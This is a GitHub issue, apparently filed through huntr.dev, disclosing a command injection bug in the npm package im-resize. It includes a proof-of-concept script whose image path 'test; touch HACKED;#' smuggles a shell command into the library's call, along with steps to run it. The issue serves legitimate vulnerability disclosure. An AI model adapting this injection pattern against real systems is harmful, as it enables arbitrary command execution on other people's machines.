Skip to content
This repository was archived by the owner on May 1, 2025. It is now read-only.
This repository was archived by the owner on May 1, 2025. It is now read-only.

huntr.dev - Command Injection #20

Description

@huntr-helper

This issue has been generated on-behalf of Mik317 (https://huntr.dev/app/users/Mik317)

Vulnerability Description

The issue occurs because a user input is formatted inside a command that will be executed without any check. The issue arises here: https://github.com/Turistforeningen/node-im-resize/blob/master/index.js#L115

Steps To Reproduce:

  1. Create the following PoC file:
// poc.js
var resize = require('im-resize');

var image = {
  path: 'test; touch HACKED;#',
  width: 5184,
  height: 2623
};
 
var output = {
  versions: [{
    suffix: '-thumb',
    maxHeight: 150,
    maxWidth: 150,
    aspect: "3:2"
  },{
    suffix: '-square',
    maxWidth: 200,
    aspect: "1:1"
  }]
};
 
resize(image, output, function(error){console.log()});
  1. Check there aren't files called HACKED
  2. Execute the following commands in another terminal:
npm i im-resize # Install affected module
node poc.js #  Run the PoC
  1. Recheck the files: now HACKED has been created

Bug Bounty

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Fields

    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions